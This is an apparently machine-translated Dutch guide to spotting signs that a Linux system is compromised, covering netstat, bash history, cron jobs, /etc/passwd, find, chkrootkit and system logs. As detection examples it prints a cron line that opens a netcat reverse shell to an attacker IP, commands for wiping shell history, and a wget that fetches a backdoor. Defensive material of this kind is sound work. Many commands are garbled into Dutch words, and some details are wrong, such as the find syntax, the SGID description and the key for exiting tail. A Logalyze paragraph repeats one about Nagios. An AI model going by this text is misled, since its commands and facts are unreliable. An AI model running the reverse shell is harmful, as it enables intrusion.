Hoe te bepalen of een Linux-systeem gecompromitteerd is?

Er zijn veel redenen waarom een hacker zich in uw systeem zou wormen en u ernstige problemen zou bezorgen. Jaren geleden was het misschien om te pronken met iemands vaardigheden, maar tegenwoordig kunnen de bedoelingen achter dergelijke activiteiten veel gecompliceerder zijn met veel verstrekkendere gevolgen voor het slachtoffer. Dit klinkt misschien voor de hand liggend, maar alleen omdat "alles goed lijkt", betekent dit niet dat alles in orde is. Hackers kunnen uw systeem binnendringen zonder u hiervan op de hoogte te stellen en het te infecteren met malware om volledige controle over te nemen, en zelfs voor zijwaartse bewegingen tussen systemen. De malware kan in het systeem worden verborgen en dient als achterdeur of een Command & Control-systeem voor hackers om kwaadaardige activiteiten op uw systeem uit te voeren.Het is beter om veilig te zijn dan sorry. U realiseert zich misschien niet meteen dat uw systeem is gehackt, maar er zijn enkele manieren waarop u kunt bepalen of uw systeem is gehackt. In dit artikel wordt besproken hoe u kunt bepalen of uw Linux systeem is gecompromitteerd door een onbevoegde persoon of een bot logt in op uw systeem om kwaadaardige activiteiten uit te voeren.

Netstat

Netstat is een belangrijk opdrachtregel-TCP/IP-netwerkhulpprogramma dat informatie en statistieken biedt over gebruikte protocollen en actieve netwerkverbindingen.

We zullen gebruiken netstat op een voorbeeldmachine van het slachtoffer om te controleren op iets verdachts in de actieve netwerkverbindingen via de volgende opdracht:

[e-mail beveiligd]:~$ netstat -antp

Hier zien we alle momenteel actieve verbindingen. Nu gaan we op zoek naar een verbinding die er niet zou moeten zijn.

Hier is hij dan, een actieve verbinding op PORT 44999 (een poort die niet open mag zijn).We kunnen andere details over de verbinding zien, zoals de PID, en de programmanaam die wordt uitgevoerd in de laatste kolom. In dit geval is de PID is 1555 en de kwaadaardige payload die wordt uitgevoerd, is de ./schelp.elf het dossier.

Een andere opdracht om te controleren op de poorten die momenteel luisteren en actief zijn op uw systeem is als volgt:

[e-mail beveiligd]:~$ netstat -la

Dit is nogal een rommelige output. Om de luisterende en tot stand gebrachte verbindingen uit te filteren, gebruiken we de volgende opdracht:

[e-mail beveiligd]:~$ netstat -la | grep “LUISTEREN” “VESTIGING”

Dit geeft u alleen de resultaten die voor u belangrijk zijn, zodat u deze resultaten gemakkelijker kunt doorzoeken. We kunnen een actieve verbinding zien op poort 44999 in de bovenstaande resultaten.

Nadat u het schadelijke proces hebt herkend, kunt u het proces beëindigen via de volgende opdrachten:. We noteren de PID van het proces met behulp van de opdracht netstat, en het proces beëindigen via de volgende opdracht:

[e-mail beveiligd]:~$ kill 1555

~.bash-geschiedenis

Linux houdt bij welke gebruikers op het systeem zijn ingelogd, vanaf welk IP-adres, wanneer en voor hoe lang.

U kunt toegang krijgen tot deze informatie met de laatste opdracht. De uitvoer van deze opdracht zou er als volgt uitzien:

[e-mail beveiligd]:~$ laatste

De uitvoer toont de gebruikersnaam in de eerste kolom, de Terminal in de tweede, het bronadres in de derde, de inlogtijd in de vierde kolom en de totale sessietijd die is geregistreerd in de laatste kolom. In dit geval hebben de gebruikers usman en ubuntu zijn nog steeds ingelogd. Als je een sessie ziet die niet geautoriseerd is of er kwaadaardig uitziet, raadpleeg dan de laatste sectie van dit artikel.

De loggeschiedenis wordt opgeslagen in ~.bash-geschiedenis het dossier. De geschiedenis kan dus eenvoudig worden verwijderd door de .bash-geschiedenis het dossier. Deze actie wordt vaak uitgevoerd door aanvallers om hun sporen uit te wissen.

[e-mail beveiligd]:~$ cat .bash_history

Deze opdracht toont de opdrachten die op uw systeem worden uitgevoerd, met de laatst uitgevoerde opdracht onderaan de lijst.

De geschiedenis kan worden gewist via het volgende commando:

[e-mail beveiligd]:~$ geschiedenis -c

Met deze opdracht wordt alleen de geschiedenis verwijderd van de terminal die u momenteel gebruikt. Er is dus een meer correcte manier om dit te doen:

[email protected]:~$ cat /dev/null > ~/.bash_history

Hiermee wordt de inhoud van de geschiedenis gewist, maar blijft het bestand op zijn plaats. Dus, als u alleen uw huidige login ziet na het uitvoeren van de laatste commando, dit is helemaal geen goed teken. Dit geeft aan dat uw systeem mogelijk is gehackt en dat de aanvaller waarschijnlijk de geschiedenis heeft verwijderd.

Als u een kwaadwillende gebruiker of IP-adres vermoedt, logt u in als die gebruiker en voert u de opdracht uit geschiedenis, als volgt:

[e-mail beveiligd]:~$ su
[e-mail beveiligd]:~$ geschiedenis

Deze opdracht toont de geschiedenis van de opdrachten door het bestand te lezen .bash-geschiedenis in de /huis map van die gebruiker. Zoek zorgvuldig naar wget, krullen, of netcat commando's, voor het geval de aanvaller deze commando's heeft gebruikt om bestanden over te dragen of om buiten repo-tools te installeren, zoals crypto-mijnwerkers of spambots.

Kijk eens naar onderstaand voorbeeld:

Hierboven zie je de opdracht “wget https://github.com/sajith/mod-rootme.” In deze opdracht probeerde de hacker toegang te krijgen tot een repo-bestand met behulp van wget om een achterdeur genaamd "mod-root me" te downloaden en op je systeem te installeren. Deze opdracht in de geschiedenis betekent dat het systeem is gecompromitteerd en door een aanvaller is gehackt.

Onthoud dat dit bestand gemakkelijk kan worden verwijderd of dat de substantie ervan kan worden geproduceerd. De gegevens die door deze opdracht worden gegeven, mogen niet als een definitieve realiteit worden beschouwd. Maar in het geval dat de aanvaller een "slecht" commando voerde en verzuimde de geschiedenis te evacueren, zal het er zijn.

Cron-banen

Cron-taken kunnen als een essentieel hulpmiddel dienen wanneer ze zijn geconfigureerd om een omgekeerde shell op de aanvallersmachine in te stellen. Cronjobs bewerken is een belangrijke vaardigheid, net als weten hoe je ze kunt bekijken.

Om de cron-taken te bekijken die voor de huidige gebruiker worden uitgevoerd, gebruiken we de volgende opdracht:

[e-mail beveiligd]:~$ crontab -l

Om de cron-taken te bekijken die voor een andere gebruiker worden uitgevoerd (in dit geval Ubuntu), gebruiken we de volgende opdracht:

[e-mail beveiligd]:~$ crontab -u ubuntu -l

Om dagelijkse, uurlijkse, wekelijkse en maandelijkse cron-taken te bekijken, gebruiken we de volgende opdrachten:

Dagelijkse Cron-banen:

[e-mail beveiligd]:~$ ls -la /etc/cron.dagelijks

Cron-banen per uur:

[e-mail beveiligd]:~$ ls -la /etc/cron.elk uur

Wekelijkse Cron-banen:

[e-mail beveiligd]:~$ ls -la /etc/cron.wekelijks

Neem een voorbeeld:

De aanvaller kan een cron-job plaatsen /etc/crontab die elk uur 10 minuten over de tijd een kwaadaardig commando uitvoert. De aanvaller kan ook een kwaadaardige service of een reverse shell-backdoor uitvoeren via run netcat of een ander hulpprogramma. Wanneer u de opdracht uitvoert $~ crontab -l, je ziet een cron-job lopen onder:

[e-mail beveiligd]:~$ crontab -l
CT=$(crontab -l)
CT=$CT$'\n10 * * * * nc -e /bin/bash 192.168.8.131 44999'
printf "$CT" | crontab -
ps aux

Om goed te kunnen controleren of uw systeem is gehackt, is het ook belangrijk om lopende processen te bekijken. Er zijn gevallen waarin sommige ongeautoriseerde processen niet genoeg CPU-gebruik verbruiken om vermeld te worden in de top opdracht. Dat is waar we de . zullen gebruiken ps commando om alle momenteel lopende processen te tonen.

[e-mail beveiligd]:~$ ps auxf

De eerste kolom toont de gebruiker, de tweede kolom toont een unieke proces-ID en CPU- en geheugengebruik worden weergegeven in de volgende kolommen.

Deze tabel geeft u de meeste informatie. U moet elk lopend proces inspecteren om te zoeken naar iets bijzonders om te weten of het systeem is gecompromitteerd of niet. In het geval dat u iets verdachts vindt, Google het of voer het uit met de lsof commando, zoals hierboven getoond. Dit is een goede gewoonte om te rennen ps commando's op uw server en het vergroot uw kansen om iets verdachts of buiten uw dagelijkse routine te vinden.

/etc/passwd

De /etc/passwd bestand houdt elke gebruiker in het systeem bij. Dit is een door dubbele punten gescheiden bestand met informatie zoals de gebruikersnaam, gebruikers-ID, versleuteld wachtwoord, GroupID (GID), volledige naam van de gebruiker, de homedirectory van de gebruiker en de login-shell.

Als een aanvaller je systeem hackt, bestaat de kans dat hij of zij nog meer gebruikers maakt, om dingen gescheiden te houden of om een achterdeur in je systeem te maken om die achterdeur weer te kunnen gebruiken. Terwijl u controleert of uw systeem is gecompromitteerd, moet u ook elke gebruiker in het /etc/passwd-bestand . verifiëren. Typ hiervoor de volgende opdracht:

[e-mail beveiligd]:~$ cat etc/passwd

Deze opdracht geeft je een uitvoer die lijkt op die hieronder:

gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
usman:x:1000:1000:usman:/home/usman:/bin/bash
postgres:x:122:128:PostgreSQL-beheerder,,,:/var/lib/postgresql:/bin/bash
debian-tor:x:123:129::/var/lib/tor:/bin/false
ubuntu:x:1001:1001:ubuntu,,,:/home/ubuntu:/bin/bash
lightdm:x:125:132:Light Display Manager:/var/lib/lightdm:/bin/false
Debian-gdm:x:124:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
anoniem:x:1002:1002:,,,:/home/anoniem:/bin/bash

Nu wilt u zoeken naar elke gebruiker waarvan u niet op de hoogte bent. In dit voorbeeld ziet u een gebruiker in het bestand met de naam "anoniem".Een ander belangrijk ding om op te merken is dat als de aanvaller een gebruiker heeft gemaakt om weer mee in te loggen, de gebruiker ook een "/bin/bash" -shell krijgt toegewezen. U kunt uw zoekopdracht dus verfijnen door de volgende uitvoer te gebruiken:

[email protected]:~$ cat /etc/passwd | grep -i "/bin/bash"
usman:x:1000:1000:usman:/home/usman:/bin/bash
postgres:x:122:128:PostgreSQL-beheerder,,,:/var/lib/postgresql:/bin/bash
ubuntu:x:1001:1001:ubuntu,,,:/home/ubuntu:/bin/bash
anoniem:x:1002:1002:,,,:/home/anoniem:/bin/bash

Je kunt nog wat "bash-magie" uitvoeren om je uitvoer te verfijnen.

[email protected]:~$ cat /etc/passwd | grep -i "/bin/bash" | knippen -d ":" -f 1
usman
postgres
ubuntu
anoniem

Vind

Op tijd gebaseerde zoekopdrachten zijn handig voor snelle triage. De gebruiker kan ook de tijdstempels voor het wijzigen van bestanden wijzigen. Om de betrouwbaarheid te verbeteren, neemt u ctime op in de criteria, omdat het veel moeilijker is om ermee te knoeien omdat het wijzigingen van sommige niveaubestanden vereist.

U kunt de volgende opdracht gebruiken om bestanden te vinden die in de afgelopen 5 dagen zijn gemaakt en gewijzigd:

[e-mail beveiligd]:~$ find / -mtime -o -ctime -5

Om alle SUID-bestanden te vinden die eigendom zijn van de root en om te controleren of er onverwachte items in de lijsten staan, gebruiken we de volgende opdracht:

[e-mail beveiligd]:~$ find / -perm -4000 -user root -type f

Om alle SGID-bestanden (set user ID) die eigendom zijn van de root te vinden en te controleren of er onverwachte items in de lijsten staan, gebruiken we de volgende opdracht:

[email protected]:~$ find / -perm -6000 -type f

Chkrootkit

Rootkits zijn een van de ergste dingen die een systeem kunnen overkomen en zijn een van de gevaarlijkste aanvallen, gevaarlijker dan malware en virussen, zowel wat betreft de schade die ze aan het systeem toebrengen als de moeilijkheid om ze te vinden en te detecteren.

Ze zijn zo ontworpen dat ze verborgen blijven en kwaadaardige dingen doen, zoals het stelen van creditcards en online bankgegevens. Rootkits geef cybercriminelen de mogelijkheid om uw computersysteem te controleren. Rootkits helpen de aanvaller ook om uw toetsaanslagen te controleren en uw antivirussoftware uit te schakelen, waardoor het nog gemakkelijker wordt om uw privégegevens te stelen.

Dit soort malware kan lange tijd op uw systeem blijven staan zonder dat de gebruiker het merkt, en kan ernstige schade aanrichten. Zodra de Rootkit wordt gedetecteerd, is er geen andere manier dan het hele systeem opnieuw te installeren. Soms kunnen deze aanvallen zelfs hardwarestoringen veroorzaken.

Gelukkig zijn er enkele hulpmiddelen die kunnen helpen bij het opsporen Rootkits op Linux-systemen, zoals Lynis, Clam AV of LMD (Linux Malware Detect). U kunt uw systeem controleren op bekende Rootkits met behulp van de onderstaande commando's:.

Installeer eerst Chkrootkit via het volgende commando:

[e-mail beveiligd]:~$ sudo apt install chkrootkit

Dit zal de . installeren Chkrootkit gereedschap. U kunt deze tool gebruiken om te controleren op rootkits via de volgende opdracht:

[e-mail beveiligd]:~$ sudo chkrootkit

Het Chkrootkit-pakket bestaat uit een shellscript dat systeembinaire bestanden controleert op rootkit-modificatie, evenals verschillende programma's die controleren op verschillende beveiligingsproblemen. In het bovenstaande geval heeft het pakket gecontroleerd op een teken van Rootkit op het systeem en niets gevonden. Nou, dat is een goed teken!

Linux-logboeken

Linux-logboeken geven een tijdschema van gebeurtenissen op het Linux-werkraamwerk en -applicaties, en zijn een belangrijk onderzoeksinstrument wanneer u problemen ondervindt. De primaire taak die een beheerder moet uitvoeren wanneer hij of zij ontdekt dat het systeem is gecompromitteerd, zou het ontleden van alle logrecords moeten zijn.

Voor expliciete problemen met werkgebiedtoepassing worden logboekrecords in contact gehouden met verschillende gebieden. Chrome stelt bijvoorbeeld crashrapporten op om '~/.chrome/crashrapporten'), waar een werkgebiedtoepassing logboeken samenstelt die afhankelijk zijn van de technicus en laat zien of de toepassing rekening houdt met aangepaste logboekindeling. Records zijn in de/var/log map. Er zijn Linux-logboeken voor alles: framework, gedeelte, bundelleiders, opstartformulieren, Xorg, Apache en MySQL. In dit artikel zal het thema zich expliciet concentreren op Linux framework-logs.

U kunt naar deze catalogus overschakelen met behulp van de cd-bestelling. U moet rootrechten hebben om logbestanden te bekijken of te wijzigen.

[e-mail beveiligd]:~$ cd /var/log

Instructies om Linux-logboeken te bekijken

Gebruik de volgende opdrachten om de benodigde logdocumenten te zien:.

Linux-logboeken kunnen worden bekeken met het commando cd /var/log, op dat moment door de bestelling samen te stellen om de logboeken onder deze catalogus te zien opgeborgen. Een van de belangrijkste logboeken is de syslog, die veel belangrijke logs logt.

ubuntu@ubuntu: kattensyslog

Om de uitvoer te zuiveren, gebruiken we de "minder" opdracht.

ubuntu@ubuntu: kattensyslog | minder

Typ de opdracht var/log/syslog om nogal wat dingen te zien onder de syslog-bestand. Het kost wat tijd om je op een bepaald probleem te concentreren, aangezien deze plaat meestal lang zal zijn. Druk op Shift+G om in de record naar END te scrollen, aangeduid met “END “.”

U kunt de logboeken ook zien door middel van dmesg, die de ondersteuning voor de onderdeelring afdrukt. Deze functie drukt alles af en stuurt je zo ver mogelijk langs het document. Vanaf dat moment kunt u de bestelling gebruiken dmesg | minder door de opbrengst kijken. In het geval dat u de logboeken voor de opgegeven gebruiker moet zien, moet u de volgende opdracht uitvoeren:

dmesg - facility=gebruiker

Kortom, u kunt de staartvolgorde gebruiken om de logdocumenten te bekijken. Het is een klein maar handig hulpprogramma dat je kunt gebruiken, omdat het wordt gebruikt om het laatste deel van de logboeken weer te geven, waar het probleem zich waarschijnlijk heeft voorgedaan. U kunt ook het aantal laatste bytes of regels specificeren dat moet worden weergegeven in de staartopdracht. Gebruik hiervoor het commando staart /var/log/syslog. Er zijn veel manieren om naar logs te kijken.

Voor een bepaald aantal regels (het model houdt rekening met de laatste 5 regels), voert u de volgende opdracht in:

[e-mail beveiligd]:~$ tail -f -n 5 /var/log/syslog

Hiermee worden de laatste 5 regels afgedrukt. Als er een andere lijn komt, wordt de eerste geëvacueerd. Om de staartvolgorde te verlaten, drukt u op Ctrl+X.

Belangrijke Linux-logboeken

De primaire vier Linux-logboeken omvatten:

Toepassingslogboeken
Gebeurtenislogboeken
Servicelogboeken
Systeemlogboeken

ubuntu@ubuntu: kattensyslog | minder

/var/log/syslog of /var/log/berichten: algemene berichten, net als kadergerelateerde gegevens. Dit logboek slaat alle actie-informatie op over het wereldwijde framework.

ubuntu@ubuntu: kat auth.log | minder

/var/log/auth.log of /var/log/secure: verificatielogboeken opslaan, inclusief zowel effectieve als mislukte aanmeldingen en validatiestrategieën. Debian en Ubuntu gebruiken /var/log/auth.log om inlogpogingen op te slaan, terwijl Redhat en CentOS gebruiken /var/log/secure om authenticatielogboeken op te slaan.

ubuntu@ubuntu: kattenlaars.log | minder

/var/log/boot.log: bevat info over opstarten en berichten tijdens opstarten.

ubuntu@ubuntu: kattenmaillog | minder

/var/log/maillog of /var/log/mail.log: slaat alle logs op die zijn geïdentificeerd met mailservers; waardevol wanneer u gegevens nodig heeft over postfix, smtpd of e-mailgerelateerde administraties die op uw server worden uitgevoerd.

ubuntu@ubuntu: kat kern | minder

/var/log/kern: bevat informatie over kernellogboeken. Dit logboek is belangrijk voor het onderzoeken van aangepaste porties.

ubuntu@ubuntu: kat dmesg | minder

/var/log/dmesg: bevat berichten die gadgetstuurprogramma's identificeren. De bestelling dmesg kan worden gebruikt om berichten in dit record te zien.

ubuntu@ubuntu: kat faillog | minder

/var/log/faillog: bevat gegevens over alle mislukte inlogpogingen, waardevol voor het oppikken van stukjes kennis over pogingen tot beveiligingspenetraties; bijvoorbeeld degenen die login-certificeringen willen hacken, net als aanvallen op dierenkracht.

ubuntu@ubuntu: cat cron | minder

/var/log/cron: slaat alle Cron-gerelateerde berichten op; cron-banen, bijvoorbeeld, of wanneer de cron-daemon een roeping begon, gerelateerde teleurstellingsberichten, enzovoort.

ubuntu@ubuntu: kat yum.log | minder

/var/log/yum.log: als u bundels introduceert met behulp van de yum-volgorde, slaat dit logboek alle gerelateerde gegevens op, wat handig kan zijn om te beslissen of een bundel en alle segmenten effectief zijn geïntroduceerd.

ubuntu@ubuntu: kat httpd | minder

/var/log/httpd/ of /var/log/apache2: deze twee mappen worden gebruikt om alle soorten logboeken voor een Apache HTTP-server op te slaan, inclusief toegangslogboeken en foutenlogboeken. Het error_log-bestand bevat alle slechte verzoeken die zijn ontvangen door de http-server. Deze fouten omvatten geheugenproblemen en andere framework-gerelateerde blunders. De access_log bevat een record van alle verzoeken die zijn ontvangen via HTTP.

ubuntu@ubuntu: cat mysqld.log | minder

/var/log/mysqld.log of/var/log/mysql.log : het MySQL-logdocument dat alle fout-, debug- en succesberichten registreert. Dit is een ander geval waarbij het raamwerk naar het register verwijst; RedHat, CentOS, Fedora en andere op RedHat gebaseerde frameworks gebruiken/var/log/mysqld.log, terwijl Debian/Ubuntu de/var/log/mysql.log catalogus.

Hulpmiddelen voor het bekijken van Linux-logboeken

Er zijn tegenwoordig veel open source logboektrackers en onderzoeksapparaten beschikbaar, waardoor het kiezen van de juiste middelen voor actielogboeken eenvoudiger is dan u zou vermoeden. De gratis en open source Log checkers kunnen op elk systeem werken om de klus te klaren. Hier zijn vijf van de beste die ik in het verleden heb gebruikt, in willekeurige volgorde.

GRIJSLOG

Graylog, gestart in Duitsland in 2011, wordt nu aangeboden als een open source-apparaat of een zakelijke overeenkomst. Graylog is bedoeld als een samengebracht, log-the-board-framework dat informatiestromen van verschillende servers of eindpunten ontvangt en u in staat stelt om die gegevens snel door te nemen of op te splitsen.

Graylog heeft door zijn eenvoud en veelzijdigheid een positieve bekendheid opgebouwd onder kaderhoofden. De meeste webondernemingen beginnen klein, maar kunnen zich exponentieel ontwikkelen. Graylog kan stapels aanpassen via een systeem van backend-servers en elke dag een paar terabytes aan loggegevens verwerken.

IT-voorzitters zullen de voorkant van de GrayLog-interface zien als eenvoudig te gebruiken en krachtig in zijn bruikbaarheid. Graylog werkt rond het idee van dashboards, waarmee gebruikers het type metingen of informatiebronnen kunnen kiezen die ze belangrijk vinden en snel hellingen kunnen waarnemen na enige tijd.

Wanneer zich een beveiligings- of uitvoeringsepisode voordoet, moeten IT-voorzitters de mogelijkheid hebben om de manifestaties naar een onderliggende driver zo snel als redelijkerwijs verwacht mag worden te volgen. De zoekfunctie van Graylog maakt deze taak eenvoudig. Deze tool heeft gewerkt bij de aanpassing aan intern falen dat multi-string ventures kan uitvoeren, zodat u samen een paar potentiële gevaren kunt doorbreken.

NAGIOS

Gestart door één enkele ontwikkelaar in 1999, is Nagios sindsdien uitgegroeid tot een van de meest solide open source-instrumenten voor het overzien van loginformatie. De huidige versie van Nagios kan worden geïmplementeerd op servers met elk soort besturingssysteem (Linux, Windows, enz.).

Het essentiële item van Nagios is een logserver, die het informatieassortiment stroomlijnt en gegevens geleidelijk beschikbaar maakt voor kadermanagers. De motor van de logserver van Nagios vangt geleidelijk informatie op en voert deze in een baanbrekend zoekinstrument. Opnemen met een ander eindpunt of toepassing is een eenvoudige fooi voor deze inherente arrangementwizard.

Nagios wordt vaak gebruikt in verenigingen die de veiligheid van hun buurten moeten screenen en kunnen een reeks systeemgerelateerde gelegenheden beoordelen om het overbrengen van waarschuwingen te robotiseren. Nagios kan worden geprogrammeerd om specifieke taken uit te voeren wanneer aan een bepaalde voorwaarde is voldaan, waardoor gebruikers problemen kunnen detecteren nog voordat de behoeften van een mens zijn opgenomen.

Als een belangrijk aspect van systeemevaluatie zal Nagios loginformatie kanaliseren, afhankelijk van het geografische gebied waar het begint. Complete dashboards met mapping-innovatie kunnen worden geïmplementeerd om de streaming van webverkeer te zien.

LOGALYZE

Logalyze produceert open source-tools voor framework-directeuren of systeembeheerders en beveiligingsspecialisten om hen te helpen bij het toezicht op serverlogboeken en hen te laten focussen op het omzetten van de logboeken in waardevolle informatie. Het essentiële van deze tool is dat het toegankelijk is als gratis download voor thuis- of zakelijk gebruik.

Als een belangrijk aspect van systeemevaluatie zal Nagios loginformatie kanaliseren, afhankelijk van het geografische gebied waar het begint. Er kunnen complete dashboards met mapping-innovatie worden geïmplementeerd om de streaming van webverkeer te zien.

Wat moet u doen als u bent gecompromitteerd??

Het belangrijkste is om niet in paniek te raken, vooral als de onbevoegde persoon nu is ingelogd. U moet de mogelijkheid hebben om de controle over de machine terug te nemen voordat de andere persoon weet dat u van hem weet. In het geval dat ze weten dat u zich bewust bent van hun aanwezigheid, kan de aanvaller u buiten uw server houden en uw systeem beginnen te vernietigen. Als je niet zo technisch bent, hoef je alleen maar de hele server onmiddellijk af te sluiten. U kunt de server afsluiten via de volgende commando's:

[e-mail beveiligd]:~$ shutdown -h now

[e-mail beveiligd]:~$ systemctl poweroff

Een andere manier om dit te doen is door in te loggen op het configuratiescherm van uw hostingprovider en het vanaf daar af te sluiten. Zodra de server is uitgeschakeld, kunt u werken aan de firewallregels die nodig zijn en in uw eigen tijd met iedereen overleggen voor hulp.

Als je je zelfverzekerder voelt en je hostingprovider een upstream-firewall heeft, maak en schakel dan de volgende twee regels in:

Sta SSH-verkeer toe van alleen uw IP-adres.
Blokkeer al het andere, niet alleen SSH maar elk protocol dat op elke poort draait.

Gebruik de volgende opdracht om te controleren op actieve SSH-sessies:

[e-mail beveiligd]:~$ ss | grep ssh

Gebruik de volgende opdracht om hun SSH-sessie te beëindigen:

[e-mail beveiligd]:~$ kill

Hierdoor wordt hun SSH-sessie beëindigd en krijgt u toegang tot de server. Als u geen toegang heeft tot een upstream-firewall, moet u de firewallregels op de server zelf maken en inschakelen. Wanneer de firewallregels zijn ingesteld, beëindigt u vervolgens de SSH-sessie van de onbevoegde gebruiker via de opdracht "kill".

Een laatste techniek, indien beschikbaar, inloggen op de server door middel van een out-of-band verbinding, zoals een seriële console. Stop alle netwerken via de volgende opdracht:

[e-mail beveiligd]:~$ systemctl stop netwerk.onderhoud

Dit zorgt ervoor dat geen enkel systeem u kan bereiken, zodat u de firewall-controles nu in uw eigen tijd kunt inschakelen.

Zodra u de controle over de server terugkrijgt, vertrouw deze dan niet gemakkelijk. Probeer niet om dingen op te knappen en ze opnieuw te gebruiken. Wat kapot is, kan niet worden gerepareerd. Je zou nooit weten wat een aanvaller zou kunnen doen, en dus zou je nooit zeker moeten zijn dat de server veilig is. Dus opnieuw installeren zou je laatste stap moeten zijn.